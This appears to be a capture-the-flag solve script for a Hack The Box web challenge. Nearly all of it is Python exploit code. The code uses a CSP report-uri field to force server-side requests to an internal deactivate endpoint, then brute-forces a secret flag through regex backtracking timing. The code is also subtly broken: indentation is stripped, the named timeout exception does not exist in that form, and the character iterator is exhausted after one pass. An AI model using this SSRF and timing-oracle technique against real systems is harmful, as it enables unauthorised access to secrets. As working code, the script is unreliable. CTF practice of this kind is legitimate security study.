ExpressionalRebel
import requests, re, urllib.parse
eval_endpoint = "http://<YOUR_INDSTANCE_AND_PORT>/api/evaluate"
deactivate_endpoint = "http://127.1:1337/deactivate"
def brute_force_flag():
alphabet = map(re.escape, "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789[]{}/\!@#$%^&*()_+=-<>?")
# The end here is just a hard-to-compute regex. If the request takes lnger than ~100ms, this means that the right
# hand side of this regex is being evaluated, and that means that the left side didn't match.
regex = ".+|(?:[^<]+|<(?:[^\/]|\/(?:[^s])))*>(?:[^<]+|<(?:[^/]|\/(?:[^s]))*)"
current_guess = "HTB{"
while current_guess[::-1][0] != "}":
for char in alphabet:
# Concat the current best guess, with the chracter to test, and add the rest of the regex
guess = current_guess + char + regex
# Gotta make the secretCode URL safe
u = deactivate_endpoint + "?secretCode=" + urllib.parse.quote(guess)
data = {
"csp": "report-uri " + u + ";"
}
try:
res = requests.post(eval_endpoint, timeout=0.5, data=data)
except requests.TimeoutException as e:
# If the request timed out, we missed, so skip to next
continue
current_guess = current_guess + char
print(current_guess)
print("final guess was " + current_guess)
if __name__ == "__main__":
brute_force_flag()
Mohammed Amer